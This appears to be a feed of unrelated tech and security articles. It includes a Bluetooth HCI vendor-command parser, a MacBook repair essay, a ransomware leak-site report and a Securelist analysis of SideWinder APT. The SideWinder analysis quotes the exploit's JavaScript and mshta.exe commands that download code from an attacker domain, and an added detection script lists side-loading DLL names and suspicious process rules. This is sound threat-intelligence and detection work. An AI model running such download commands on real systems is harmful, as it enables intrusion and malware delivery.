Effectively, [Xeno] makes the point that VSCs are a standard feature in Bluetooth controllers, which – like most features – can also be abused. [Tarlogic] has since updated their article as well to distance themselves from the ‘backdoor’ term and instead want to call these VSCs a ‘hidden feature’. That said, if these VSCs in ESP32 chips are a security risk, then as [Xeno] duly notes, millions of BT controllers from Texas Instruments, Broadcom and others with similar VSCs would similarly be a security risk.
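What makes a command “vendor-specific” is just its opcode: the Bluetooth Core Specification reserves Opcode Group Field 0x3F for them, so any host stack or HCI sniffer can tell at a glance which commands fall outside the standard set. The following is an added example (not code from Tarlogic, Espressif or the linked article) that builds H4-framed HCI command packets, parses a raw command stream back into OGF/OCF pairs, and lists only the vendor-specific ones, which is the set an audit of a host stack would want to review. The vendor OCF and parameter bytes in the sample stream are placeholders, not a claim about any real ESP32 command.

```python
"""Spotting vendor-specific commands (OGF 0x3F) in an HCI command stream.

Added example, not code from Tarlogic, Espressif or the linked article.
Opcode layout (OGF in the top 6 bits, OCF in the low 10 bits) and the H4
UART framing (indicator 0x01, little-endian opcode, parameter length,
parameters) follow the Bluetooth Core Specification. The vendor OCF in
sample_stream() is a placeholder, not a real ESP32 command.
"""
import struct

H4_COMMAND = 0x01
OGF_VENDOR = 0x3F
OGF_BASEBAND, OCF_RESET = 0x03, 0x0003   # HCI_Reset, a standard command


def opcode(ogf: int, ocf: int) -> int:
    return ((ogf & 0x3F) << 10) | (ocf & 0x3FF)


def split_opcode(op: int):
    return op >> 10, op & 0x3FF


def hci_command(ogf: int, ocf: int, params: bytes = b"") -> bytes:
    """H4 framing: indicator 0x01, LE opcode, parameter length, parameters."""
    return struct.pack("<BHB", H4_COMMAND, opcode(ogf, ocf), len(params)) + params


def parse_h4_commands(stream: bytes):
    """Yield (ogf, ocf, params) for each command packet in a raw H4 byte stream."""
    off = 0
    while off < len(stream):
        ind = stream[off]
        if ind != H4_COMMAND:
            raise ValueError(f"unsupported H4 indicator 0x{ind:02x} at offset {off}")
        op, plen = struct.unpack_from("<HB", stream, off + 1)
        params = stream[off + 4: off + 4 + plen]
        if len(params) != plen:
            raise ValueError("truncated command packet")
        yield (*split_opcode(op), params)
        off += 4 + plen


def vendor_commands(stream: bytes):
    """Only the OGF 0x3F commands: the set a host-stack audit would review."""
    return [(ocf, params) for ogf, ocf, params in parse_h4_commands(stream)
            if ogf == OGF_VENDOR]


def sample_stream() -> bytes:
    """Constructed: HCI_Reset followed by a placeholder vendor command with 4 bytes of parameters."""
    return (hci_command(OGF_BASEBAND, OCF_RESET)
            + hci_command(OGF_VENDOR, 0x0042, b"\x01\x02\x03\x04"))


if __name__ == "__main__":
    for ogf, ocf, params in parse_h4_commands(sample_stream()):
        tag = "VENDOR" if ogf == OGF_VENDOR else "std"
        print(f"{tag:6} OGF=0x{ogf:02x} OCF=0x{ocf:04x} opcode=0x{opcode(ogf, ocf):04x} params={params.hex()}")
```

The point the parser makes is the one [Xeno] makes in prose: a vendor command is recognisable and, on most controllers, documented; whether it is dangerous depends on who can send it. An attacker who can issue arbitrary HCI commands already has host-side code execution, so the question for a host stack is simply which of these opcodes it exposes to untrusted callers.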


hackaday.com/2025/03/10/the-es…


Inexpensive Repairable Laptops, With Apple Style


Despite a general lack of real-world experience, many teenagers are overly confident in their opinions, often to the point of brashness and arrogance. In the late 90s and early 00s I was no different, firmly entrenched in a clichéd belief that Apple computers weren’t worth the silicon they were etched onto—even though I’d never actually used one. Eventually, thanks to a very good friend in college, a bit of Linux knowledge, and Apple’s switch to Intel processors, I finally abandoned this one irrational belief. Now, I maintain an array of Apple laptops for my own personal use that are not only surprisingly repairable and hacker-friendly but also serve as excellent, inexpensive Linux machines.

Of course, I will have ruffled a few feathers suggesting Apple laptops are repairable and inexpensive. This is certainly not true of their phones or their newer computers, but there was a time before 2016 when Apple built some impressively high quality, robust laptops that use standard parts, have removable batteries, and, thanks to Apple dropping support for these older machines in their latest operating systems, can also be found for sale for next to nothing. In a way that’s similar to buying a luxury car that’s only a few years old and letting someone else eat the bulk of the depreciation, a high quality laptop from this era is only one Linux install away from being a usable and relatively powerful machine at an excellent bargain.

The History Lesson


To be fair to my teenage self though, Apple used to use less-mainstream PowerPC processors which meant there was very little software cross-compatibility with x86 PCs. It was also an era before broadband meant that most people could move their work into cloud and the browser, allowing them to be more agnostic about their operating system. Using an Apple when I was a teenager was therefore a much different experience than it is today. My first Apple was from this PowerPC era though; my ThinkPad T43 broke mid-way through college and a friend of mine gave me an old PowerBook G4 that had stopped working for her. Rather than have no computer at all, I swallowed my pride and was able to get the laptop working well enough to finish college with it. Part of the reason this repair was even possible was thanks to a major hacker-friendly aspect of Apple computers: they run Unix. (Note for commenters: technically Apple’s OS is Unix-like but they have carried a UNIX certification since 2007.)

I had used Unix somewhat in Solaris-based labs in college but, as I mentioned in a piece about installing Gentoo on one of my MacBooks, I was also getting pretty deep into the Linux world at the time as well. Linux was also designed to be Unix-like, so most of the basic commands and tools available for it have nearly one-to-one analogs in Unix. The PowerBook’s main problem, along with a battery that needed a warranty replacement, was a corrupted filesystem and disk drive that I was able to repair using my new Linux knowledge. This realization marked a major turning point for me which helped tear down most of my biases against Apple computers.
MacBooks through the ages
Over the next few years or so I grew quite fond of the PowerBook, partially because I liked its 12″, netbook-like form factor and also because the operating system never seemed to crash. As a Linux user, my system crashes were mostly self-inflicted, but they did happen. As a former Windows user as well, the fact that it wouldn’t randomly bluescreen itself through no fault of my own was quite a revelation. Apple was a few years into their Intel years at this point as well, and seeing how easily these computers did things my PowerBook could never do, including running Windows, I saved up enough money to buy my first MacBook Pro, a mid-2009 model which I still use to this day. Since then I’ve acquired four other Apple laptops, most of which run Linux or a patched version of macOS that lets older, unsupported machines run modern versions of Apple’s operating system.

So if you’ve slogged through my coming-of-age story and are still curious about picking up an old Mac for whatever reason—a friend or family member has one gathering dust, you’re tired of looking at the bland styling of older ThinkPads while simultaneously growing frustrated with the declining quality of their newer ones, or just want to go against the grain a bit and do something different—I’ll try and help by sharing some tips and guidelines I’ve picked up through the years.

What to Avoid


Starting with broad categories of older Apple laptops to avoid, the first major red flag are any with the butterfly keyboard that Apple put on various laptops from 2015 to 2019 which were so bad that a number of lawsuits were filed against them. Apple eventually relented and instituted a replacement program for them, but it’s since expired and can cost hundreds of dollars to fix otherwise. The second red flag are models with the T2 security chips. It’s not a complete dealbreaker but does add a lot of hassle if the end goal is a working Linux machine.

Additionally, pay close attention to any laptops with discrete graphics cards. Some older MacBooks have Nvidia graphics, which is almost always going to provide a below-average experience for a Linux user especially for Apple laptops of this vintage. Others have AMD graphics which do have better Linux support, but there were severe problems with the 15″ and 17″ Mac around the 2011 models. Discrete graphics is not something to avoid completely like laptops with butterfly keyboards, but it’s worth investigating the specific model year for problems if a graphics card is included. A final note is to be aware of “Staingate” which is a problem which impacted some Retina displays between 2012 and 2015. This of course is not an exhaustive list, but covers the major difficult-to-solve problems for this era of Apple laptop.

What to Look For


As for what specific computers are the best from this era for a bit of refurbishment and use, in my opinion the best mix of performance, hackability, and Linux-ability will be from the 2009-2012 Unibody era. These machines come in all sizes and are surprisingly upgradable, with standard SODIMM slots for RAM, 2.5″ laptop drives, an optical drive (which can be changed out for a second hard drive), easily replaceable batteries if you can unscrew the back cover, and plenty of ports. Some older models from this era have Core 2 Duo processors and should be avoided if you have the choice, but there are plenty of others from this era with much more powerful Core i5 or Core i7 processors.

After 2012, though, Apple started making some less-desirable changes for those looking to maintain their computers long-term, like switching to a proprietary M.2-like connector for storage and adding soldered or otherwise non-upgradable RAM. These machines can still be worthwhile, though, as many had Core i7 processors and at least 8 GB of RAM, and they can still run Linux and even modern macOS versions quite capably. The batteries can still be replaced without too much hassle as well.
Inside the 2012 MacBook Pro. Visible here are the 2.5″ SSD, removable battery, standard SODIMM RAM slots, optical drive, and cooling fan.
Of course, a major problem with these computers is that they all have processors with the Intel Management Engine coprocessor, so they’re not the most privacy-oriented machines in existence even if Linux is the chosen operating system. It’s worth noting, though, that some MacBooks from before the Unibody era can run the open-source boot firmware Libreboot, but the tradeoff, as with any system capable of running Libreboot, is that they’re a bit limited in performance even compared to computers from just a few years later.

Out of the five laptops I own, four are from the pre-butterfly era including my two favorites. Topping the list is a mid-2012 13″ MacBook Pro with Intel graphics that’s a beast of a Debian machine thanks to upgrades to a solid state drive and to 16 GB of RAM. It also has one of the best-feeling laptop keyboards I’ve ever used to write with, and is also the computer I used to experiment with Gentoo.

Second place goes to a 2015 11″ MacBook Air, a netbook-style Apple that I like for its exceptional portability even though it’s not as upgradable as I might otherwise like. It will have 4 GB of RAM forever, but this is not much of a problem for Debian. I also still have my 2009 MacBook Pro, which runs macOS Sonoma thanks to OpenCore Legacy Patcher. This computer’s major weakness is its Nvidia graphics card, so it isn’t as good a Linux machine as the others and occasionally locks up when running Debian for this reason. But it has also been upgraded with an SSD and 8 GB of RAM, so Sonoma still runs pretty well on it despite its age. Sequoia, on the other hand, dropped support for dual-core machines, so I’m not sure what I will do with it after Sonoma is no longer supported.
A 13″ MacBook Air from 2013. Not quite as upgradable as the 2012 MacBook Pro but still has a removable battery and a heat sink which can be re-pasted much more easily.
My newest Apple laptop is an M1 MacBook Air, which I was excited about when it launched because I’m a huge fan of ARM-based personal computers for more reasons than one. Although the M1 has essentially no user-repairability unless you want to go to extremes, I have some hope that it will last me as long as my MacBook Pros have, thanks to a complete lack of moving parts and also because of Asahi Linux, a Fedora-based distribution built for Apple silicon. Whenever Apple stops providing security patches for this machine, I plan to switch it over to this specialized Linux distribution.

Why Bother?


But why spend all this effort keeping these old machines running at all? If repairability is a major concern, laptops from companies like System76 or Framework are arguably a much better option. Not to mention that, at least according to the best Internet commenters out there, Apple computers aren’t supposed to be fixable, repairable, or upgradable at all. They’re supposed to slowly die as upgrades force them to be less useful.

While this is certainly true for their phones and their more modern machines to some extent, part of the reason I keep these older machines running is to go against the grain and do something different, like a classic car enthusiast who picks a 70s era Volkswagen to drive to and from the office every day instead of a modern Lexus. It’s also because at times I still feel a bit like that teenager I was. While I might be a little wiser now from some life experiences, I believe some amount of teenage rebellion can be put to use stubbornly refusing to buy the latest products year after year from a trillion-dollar company which has become synonymous with planned obsolescence. Take that, Apple!


hackaday.com/2025/03/10/inexpe…


Crazyhunter: the new ransomware with the “Three-dimensional Data Annihilation System”


During the reconnaissance of the underground and of criminal groups carried out by DarkLab, Red Hot Cyber’s threat intelligence laboratory, we came across the Data Leak Site of a cyber gang we had never monitored before: Crazyhunter.

With a distinct identity and a manifesto that sets it apart from other actors on the cybercriminal scene, Crazyhunter presents itself as a sophisticated operation that focuses on attack speed, data destruction and a highly structured system of criminal branding.

From the information gathered on their Data Leak Site (DLS), available on the Tor network, the group appears to adopt a methodical and aggressive approach aimed at compromising corporate security in the shortest possible time.

With a negotiation and ransom-management system that includes tools for “demonstrating” their destructive capabilities, Crazyhunter stands out for a business model that emphasises advanced encryption and even the use of a blockchain to record their decryption “promises”.

Structure of Crazyhunter’s DLS


Crazyhunter’s Tor portal is organised into several sections, with a minimal but functional design.

The homepage shows the group’s name and its motto: “There is no absolute safety”. A statement that reflects their philosophy, according to which no system is immune to a well-structured attack.

Victim List

The list of published victims shows companies and institutions, mainly in Taiwan, including hospitals and universities. Each entry reports:

  • The ransom amount demanded (up to $1,500,000).
  • The status of the negotiation, with some entries marked Expired (probably meaning the data will be released) and others marked Successful cooperation (indicating a payment was made).
  • A countdown timer to the deadline of the agreement, suggesting a mechanism of psychological pressure on the victims.

About Us: here the group describes its modus operandi and the ransomware’s strengths.

Contact Us: a page with a contact form, used for negotiations or possible collaborations.


Attack Techniques and Tactics


From the information provided in its strategic manifesto, Crazyhunter presents itself as a highly technical operation, with a series of distinctive features that make it particularly dangerous:

Ultra-fast approach: the “72-hour Vulnerability Response Vacuum”


Crazyhunter claims to breach its victims’ security in under 72 hours, thanks to:

  • Exclusive exploits, with a time-to-detection 300% longer than the averages estimated by MITRE.
  • Advanced bypass of the best-known endpoint protection systems, including CrowdStrike, SentinelOne, Microsoft Defender XDR, Symantec EDR and Trend Micro XDR.

This suggests that the group exploits zero-day or well-targeted N-day vulnerabilities, together with advanced evasion tactics that could include polymorphic malware and fileless attack techniques.

The “Three-dimensional Data Annihilation System”


Crazyhunter does not limit itself to encrypting data, but introduces a concept of “annihilation” on three levels:

  • Encryption Layer → uses the XChaCha20-Poly1305 algorithm, known for its security and speed, making it impossible to recover the data without the correct key.
  • Destruction Layer → employs a “CIA-approved” wiping technology, probably referring to standards such as DoD 5220.22-M or multi-pass overwriting methods that render the data unrecoverable.
  • Deterrence Layer → here a new element in the ransomware landscape emerges: the group claims to generate highly realistic compromising evidence against the executives of the attacked companies, by means of AI and deepfakes, to exert additional pressure during negotiations.

This mix of advanced encryption, total data destruction and reputational threats makes Crazyhunter a one-of-a-kind actor, combining traditional ransomware with methods of psychological coercion.

Criminal Branding and Blockchain


Crazyhunter also stands out for a concept unheard of in the ransomware world: criminal branding. The services offered include:

  • The option of delaying the publication of the data by paying 50% of the ransom in advance.
  • A remediation guide for the vulnerabilities used in the attack, apparently as an incentive to pay.
  • A proof video of the data deletion once the ransom has been paid.

Finally, the strategic manifesto stresses that the group does not consider itself “greedy” like REvil or “too noisy” like LockBit, and declares that it does only three things:

  1. Prove the inevitability of the attack through mathematics.
  2. Ensure the irreversibility of the threat through code.
  3. Record every kept promise on the blockchain.

The last point suggests that Crazyhunter may use a public or private blockchain to keep track of completed operations, perhaps to show future victims that the group keeps its word when it comes to providing decryptors after payment.

Targets and Victims


Analysis of the victim list on Crazyhunter’s DLS shows that the group has concentrated mainly on Taiwanese organisations, with a focus on:

  • Universities and research institutes (Asia University, Asia University Hospital).
  • Healthcare facilities (Mackay Hospital, Changhua Christian Medical Foundation).
  • Companies in the energy sector (Huacheng Electric).

The inclusion of hospitals and academic institutions suggests opportunistic targeting, where the probability of payment is high because of the sensitivity of the data involved. However, the group may expand its reach to companies in other sectors in the coming months.

Conclusions


Crazyhunter is not the usual ransomware group. Unlike other operations that focus solely on file encryption, this group introduces additional pressure tactics, including:

  • Irreversible data destruction, in addition to encryption.
  • Use of AI to create compromising evidence against executives.
  • Recording of operations on the blockchain to build “trust” in the criminal market.

Although it is still early to assess its overall impact, Crazyhunter has already shown that it can hit high-profile organisations and that it has a highly strategic operating model. The combination of advanced exploits, sophisticated encryption and coercion tactics makes it an emerging threat not to be underestimated.

For companies, the lesson is clear: protecting against traditional ransomware is not enough. The new generations of cybercriminals are honing ever more destructive strategies that are harder to counter.

The article Crazyhunter: the new ransomware with the “Three-dimensional Data Annihilation System” originally appeared on il blog della sicurezza informatica.


You Are Already Traveling at the Speed of Light


Science fiction authors and readers dream of travelling at the speed of light, but Einstein tells us we can’t. You might think that’s an arbitrary rule, but [FloatHeadPhysics] shows a different way to think about it. Based on a book he’s been reading, “Relativity Visualized,” he provides a graphical argument for relativity that you can see in the video below.

The argument starts by explaining how a three-dimensional object might appear in a two-dimensional world. In this world, everything is climbing through the hidden height dimension at exactly the same speed.

Our 2D friends, of course, can only see the shadow of the 3D object so if it is staying in one place on the table surface, the object never seems to move. However, just as we can measure time with a clock, the flat beings could devise a way to measure height. They would see that the object was moving “through height” at the fixed speed.

Now suppose the object turns a bit and moves at, say, a 45 degree angle relative to the table top. The shadow now moves, and the “clock” that measures height starts ticking more slowly. If the object moves entirely parallel to the surface, the shadow moves at the fixed speed and the height clock doesn’t move at all.

This neatly explains time dilation and length contraction. It also shows that the speed of light isn’t an arbitrary rule: everything in the observable universe is already moving at the speed of light through spacetime, and moving through space simply takes away from moving through time.
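Written out as an equation (added here, not from the video), the analogy is the statement that the “speed through space” and the “speed through time” always combine to exactly $c$, with $\tau$ the object’s own clock (proper time) and $t$ the time measured on the table:

$$\left(\frac{dx}{dt}\right)^2 + \left(c\,\frac{d\tau}{dt}\right)^2 = c^2 \quad\Longrightarrow\quad \frac{d\tau}{dt} = \sqrt{1 - \frac{v^2}{c^2}}, \qquad v = \frac{dx}{dt}.$$

At $v = 0$ the clock runs at full rate ($d\tau/dt = 1$); at $v = c$ it stops ($d\tau/dt = 0$), which is the “shadow moves at the fixed speed, clock doesn’t move” case above, and the 45 degree case gives $d\tau/dt = 1/\sqrt{2}$.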

Doesn’t make sense? Watch the video and it will. Pretty heady stuff. We love how passionate [FloatHeadPhysics] gets about the topic. If you prefer a funnier approach, turn to the BBC. Or, if you like the hands-on approach, build a cloud chamber and measure some muons.

youtube.com/embed/TJmgKdc7H34?…


hackaday.com/2025/03/10/you-ar…


SideWinder targets the maritime and nuclear sectors with an updated toolset


Last year, we published an article about SideWinder, a highly prolific APT group whose primary targets have been military and government entities in Pakistan, Sri Lanka, China, and Nepal. In it, we described activities that had mostly happened in the first half of the year. We tried to draw attention to the group, which was aggressively extending its activities beyond their typical targets, infecting government entities, logistics companies and maritime infrastructures in South and Southeast Asia, the Middle East, and Africa. We also shared further information about SideWinder’s post-exploitation activities and described a new sophisticated implant designed specifically for espionage.

We continued to monitor the group throughout the rest of the year, observing intense activity that included updates to SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control compromised systems. The targeted sectors were consistent with those we had seen in the first part of 2024, but we noticed a new and significant increase in attacks against maritime infrastructures and logistics companies.

In 2024, we initially observed a significant number of attacks in Djibouti. Subsequently, the attackers shifted their focus to other entities in Asia and showed a strong interest in targets within Egypt.

Moreover, we observed other attacks that indicated a specific interest in nuclear power plants and nuclear energy in South Asia and further expansion of activities into new countries, especially in Africa.

Countries and territories targeted by SideWinder in the maritime and logistics sectors in 2024

It is worth noting that SideWinder constantly works to improve its toolsets, stay ahead of security software detections, extend persistence on compromised networks, and hide its presence on infected systems. Based on our observation of the group’s activities, we presume they are constantly monitoring detections of their toolset by security solutions. Once their tools are identified, they respond by generating a new and modified version of the malware, often in under five hours. If behavioral detections occur, SideWinder tries to change the techniques used to maintain persistence and load components. Additionally, they change the names and paths of their malicious files. Thus, monitoring and detection of the group’s activities reminds us of a ping-pong game.

Infection vectors


The infection pattern observed in the second part of 2024 is consistent with the one described in the previous article.

Infection flow

The attacker sends spear-phishing emails with a DOCX file attached. The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker. The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process that leads to the installation of malware we have named “Backdoor Loader”. This acts as a loader for “StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder.

The documents used various themes to deceive victims into believing they are legitimate.

Some documents concerned nuclear power plants and nuclear energy agencies.

Malicious documents related to nuclear power plants and energy

Many others concerned maritime infrastructures and various port authorities.

Malicious documents relating to maritime infrastructures and different port authorities

In general, the detected documents predominantly concerned governmental decisions or diplomatic issues. Most of the attacks were aimed at various national ministries and diplomatic entities.

We also detected various documents that covered generic topics. For example, we found a document with information on renting a car in Bulgaria, a document expressing an intent to buy a garage, and another document offering a freelance video game developer a job working on a 3D action-adventure game called “Galactic Odyssey”.

Examples of generic malicious documents

RTF exploit


The exploit file contained a shellcode, which had been updated by the attacker since our previous research, but the main goal remained the same: to run embedded JavaScript code invoking the mshtml.RunHTMLApplication function. In the new version, the embedded JavaScript runs the Windows utility mshta.exe and obtains additional code from a remote server:

    javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe dgtk.depo-govpk[.]com/19263687…);window.close();")

The newer version of the shellcode still uses certain tricks to avoid sandboxes and complicate analysis, although they differ slightly from those in past versions.

  • It uses the GlobalMemoryStatusEx function to determine the size of RAM.
  • It attempts to load the nlssorting.dll library and terminates execution if the operation succeeds.


JavaScript loader


The RTF exploit led to the execution of the mshta.exe Windows utility, abused to download a malicious HTA from a remote server controlled by the attacker:

    mshta.exe hxxps://dgtk.depo-govpk[.]com/19263687/trui

The remote HTA embeds a heavily obfuscated JavaScript file that loads further malware, the “Downloader Module”, into memory.

The JavaScript loader operates in two stages. The first stage begins execution by loading various strings, initially encoded with a substitution algorithm and stored as variables. It then checks the installed RAM and terminates if the total size is less than 950 MB. Otherwise, the previously decoded strings are used to load the second stage.

The second stage is another JavaScript file. It enumerates the subfolders under %Windows%\Microsoft.NET\Framework\ to find the version of the .NET Framework installed on the system and uses the resulting value to set the environment variable COMPLUS_Version. Finally, the second stage decodes and loads the Downloader Module, which is embedded within its code as a base64-encoded .NET serialized stream.

Downloader Module


This component is a .NET library used to collect information about the installed security solution and download another component, the “Module Installer”. These components were already described in the previous article and will not be detailed again here.

In our latest investigation, we discovered a new version of the app.dll Downloader Module, which includes a more sophisticated function for identifying installed security solutions. In the previous version, the malware used a simple WMI query to obtain a list of installed products. The new version uses a different WMI query, which collects the name of the antivirus and the related “productState”.

Furthermore, the malware compares all running process names against an embedded dictionary. The dictionary contains 137 unique process names associated with popular security solutions. The WMI query is executed only when no Kaspersky processes are running on the system.

Backdoor Loader


The infection chain concludes with the installation of malware that we have named “Backdoor Loader”, a library consistently sideloaded using a legitimate and signed application. Its primary function is to load the “StealerBot” implant into memory. Both the “Backdoor Loader” and “StealerBot” were thoroughly described in our prior article, but the attacker has distributed numerous variants of the loader in recent months, whereas the implant has remained unchanged.

In the previous campaign, the “Backdoor Loader” library was designed to be loaded by two specific programs. For correct execution, it had to be stored on victims’ systems under one of the following names:

  • propsys.dll
  • vsstrace.dll

During the most recent campaign, the attackers tried to diversify the samples, generating many other variants distributed under the following names:

  • JetCfg.dll
  • policymanager.dll
  • winmm.dll
  • xmllite.dll
  • dcntel.dll
  • UxTheme.dll

The new malware variants feature an enhanced version of the anti-analysis code and employ Control Flow Flattening more extensively to evade detection.

During the investigation, we found a new C++ version of the “Backdoor Loader” component. The malware logic is the same as that used in the .NET variants, but the C++ version differs from the .NET implants in that it lacks anti-analysis techniques. Furthermore, most of the samples were tailored to specific targets, as they were configured to load the second stage from a specific file path embedded in the code, which also included the user’s name. Example:

    C:\Users\[REDACTED]\AppData\Roaming\valgrind\[REDACTED FILE NAME].[REDACTED EXTENSION]

This indicates that these variants were likely used after the infection phase and manually deployed by the attacker within the already compromised infrastructure, after validating the victim.
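Two of the behaviours described above are cheap to hunt for in endpoint telemetry: an Office-related process launching mshta.exe with a remote address (the RTF exploit and HTA stage), and a DLL carrying one of the “Backdoor Loader” file names loaded from somewhere other than the Windows system directories, where the legitimate copies live. The script below is an added example, not Kaspersky’s code; the event schema, the parent-process list and the sample events are assumptions constructed for the illustration.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Parents that have no business launching mshta.exe with a URL. winword.exe hosts
# the spear-phishing DOCX; eqnedt32.exe is the Equation Editor that CVE-2017-11882
# lives in (known fact, not stated in the article). Assumed list: extend as needed.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}

# File names under which the article says "Backdoor Loader" was distributed.
SIDELOAD_NAMES = {
    "propsys.dll", "vsstrace.dll", "jetcfg.dll", "policymanager.dll",
    "winmm.dll", "xmllite.dll", "dcntel.dll", "uxtheme.dll",
}

# Lower-case directory prefixes where the legitimate copies of those DLLs live.
TRUSTED_DLL_DIRS = (
    "c:\\windows\\system32",
    "c:\\windows\\syswow64",
    "c:\\windows\\winsxs",
)

# Matches "https://host/..." as well as the scheme-less "host.tld/path" form the
# RTF exploit's JavaScript passes to mshta.exe.
REMOTE_ARG_RE = re.compile(r"https?://\S+|\b[\w-]+(?:\.[\w-]+)+/", re.IGNORECASE)


@dataclass
class Alert:
    rule: str
    detail: str


def check_process_create(event: dict):
    """Flag mshta.exe spawned by an Office-related parent with a remote argument."""
    image = PureWindowsPath(event.get("image", "")).name.lower()
    parent = PureWindowsPath(event.get("parent_image", "")).name.lower()
    cmdline = event.get("cmdline", "")
    if image == "mshta.exe" and parent in OFFICE_PARENTS and REMOTE_ARG_RE.search(cmdline):
        return Alert("office_spawns_mshta_remote", f"{parent} -> {cmdline}")
    return None


def check_image_load(event: dict):
    """Flag a known side-loading DLL name loaded from outside the Windows directories."""
    loaded = PureWindowsPath(event.get("image_loaded", ""))
    if loaded.name.lower() not in SIDELOAD_NAMES:
        return None
    folder = str(loaded.parent).lower()
    if folder.startswith(TRUSTED_DLL_DIRS):
        return None  # the system's own copy of the DLL
    return Alert("possible_dll_sideload", f"{event.get('image')} loaded {loaded}")


def hunt(events):
    """Run both checks over a list of telemetry events; return the alerts raised."""
    alerts = []
    for event in events:
        if event.get("type") == "process_create":
            alert = check_process_create(event)
        elif event.get("type") == "image_load":
            alert = check_image_load(event)
        else:
            alert = None
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed sample telemetry (not real logs): hosts, users and paths are placeholders.
SAMPLE_EVENTS = [
    {"type": "process_create",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://c2.example/19263687/trui"},           # alert
    {"type": "process_create", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Tools\local.hta"},                         # benign: local file
    {"type": "image_load", "image": r"C:\Users\alice\AppData\Local\Temp\signed_app.exe",
     "image_loaded": r"C:\Users\alice\AppData\Local\Temp\propsys.dll"},  # alert
    {"type": "image_load", "image": r"C:\Windows\explorer.exe",
     "image_loaded": r"C:\Windows\System32\propsys.dll"},                 # benign: system copy
    {"type": "image_load", "image": r"C:\Windows\SysWOW64\notepad.exe",
     "image_loaded": r"C:\Windows\SysWOW64\winmm.dll"},                   # benign: system copy
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(f"[{alert.rule}] {alert.detail}")
```

Because the JavaScript loader exits on machines with less than 950 MB of RAM, detonation sandboxes used to observe the later stages need to be provisioned above that threshold.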

Victims


SideWinder continues to attack its usual targets, especially government, military, and diplomatic entities. The targeted sectors are consistent with those observed in the past, but it is worth mentioning that the number of attacks against the maritime and the logistics sectors has increased and expanded to Southeast Asia.

Furthermore, we observed attacks against entities associated with nuclear energy. The following industries were also affected: telecommunication, consulting, IT service companies, real estate agencies, and hotels.

Countries and territories targeted by SideWinder in 2024

Overall, the group has further extended its activities, especially in Africa. We detected attacks in Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, Philippines, Sri Lanka, the United Arab Emirates, and Vietnam.

In this latest wave of attacks, SideWinder also targeted diplomatic entities in Afghanistan, Algeria, Bulgaria, China, India, the Maldives, Rwanda, Saudi Arabia, Turkey, and Uganda.

Conclusion


SideWinder is a very active and persistent actor that is constantly evolving and improving its toolkits. Its basic infection method is the use of an old Microsoft Office vulnerability, CVE-2017-11882, which once again emphasizes the critical importance of installing security patches.

Despite the use of an old exploit, we should not underestimate this threat actor. In fact, SideWinder has already demonstrated its ability to compromise critical assets and high-profile entities, including those in the military and government. We know the group’s software development capabilities, which became evident when we observed how quickly they could deliver updated versions of their tools to evade detection, often within hours. Furthermore, we know that their toolset also includes advanced malware, like the sophisticated in-memory implant “StealerBot” described in our previous article. These capabilities make them a highly advanced and dangerous adversary.

To protect against such attacks, we strongly recommend maintaining a patch management process to apply security fixes (you can use solutions like Vulnerability Assessment and Patch Management and Kaspersky Vulnerability Data Feed) and using a comprehensive security solution that provides incident detection and response, as well as threat hunting. Our product line for businesses helps identify and prevent attacks of any complexity at an early stage. The campaign described in this article relies on spear-phishing emails as the initial attack vector, which highlights the importance of regular employee training and awareness programs for corporate security.

We will continue to monitor the activity of this group and to update heuristic and behavioral rules for effective detection of malware.

More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

Indicators of compromise

Microsoft Office Documents



Backdoor Loader



Domains and IPs




securelist.com/sidewinder-apt-…


ZX Spectrum, Soviet Style: A 44-IC Clone You Can Build


Soviet ZX Spectrum clone on a table

If you’ve ever fancied building a ZX Spectrum clone without hunting down ancient ULAs or soldering your way through 60+ chips, [Alex J. Lowry] has just dropped an exciting build. He has recreated the Leningrad-1, a Soviet-built Spectrum clone from 1988, with a refreshingly low component count: 44 off-the-shelf ICs, as he wrote us. That’s fewer than many modern clones like the Superfo Harlequin, yet without resorting to programmable logic. All schematics, Gerbers, and KiCad files are open-source, listed at the bottom of [Alex]’s build log.

The original Leningrad-1 was designed by Sergey Zonov during the late Soviet era, when cloning Western tech was less about piracy and more about survival. Zonov’s design nailed a sweet spot between affordability and usability, with enough compatibility to run 90-95% of Spectrum software. [Alex]’s replica preserves that spirit, with a few 21st-century tweaks for builders: silkscreened component values, clever PCB stacking with nylon standoffs, and a DIY-friendly mechanical keyboard hack using transparent keycaps.

While Revision 0 still has some quirks – no SCART color output yet, occasional flickering borders with AY sound – [Alex] is planning further improvements. Inspired to build your own? Read [Alex]’s full project log here.


hackaday.com/2025/03/10/zx-spe…


Two months to the RHC Conference 2025! Thanks to our Sponsors for making this event possible!


Only two months remain until the fourth edition of the Red Hot Cyber Conference 2025, the free annual event organised by the Red Hot Cyber community. The conference will be held in Rome, as last year at the Teatro Italia in Via Bari 18, on Thursday 8 and Friday 9 May 2025.

This event has become a point of reference in the Italian landscape of cybersecurity, artificial intelligence and technological innovation, with the aim of raising public awareness of digital risks and promoting a culture of cybersecurity, especially among the young.

The Red Hot Cyber community, founded in 2019 by Massimiliano Brolli, is dedicated to spreading information, news and research on topics related to cybersecurity, intelligence and Information Technology. Convinced that sharing knowledge and collaboration are fundamental to facing the challenges of cyberspace, RHC is actively committed to promoting a security culture, encouraging critical thinking and stimulating interest in computing disciplines among young people.


Reception at the Red Hot Cyber Conference 2024

A First Day Dedicated Exclusively to Young People


As every year, the first day of the conference will be entirely dedicated to young people, in particular middle and high school students, to bring them closer to the world of information technology and cybersecurity. Unlike in previous years, the Workshops will be accessible only on Thursday 8 May.

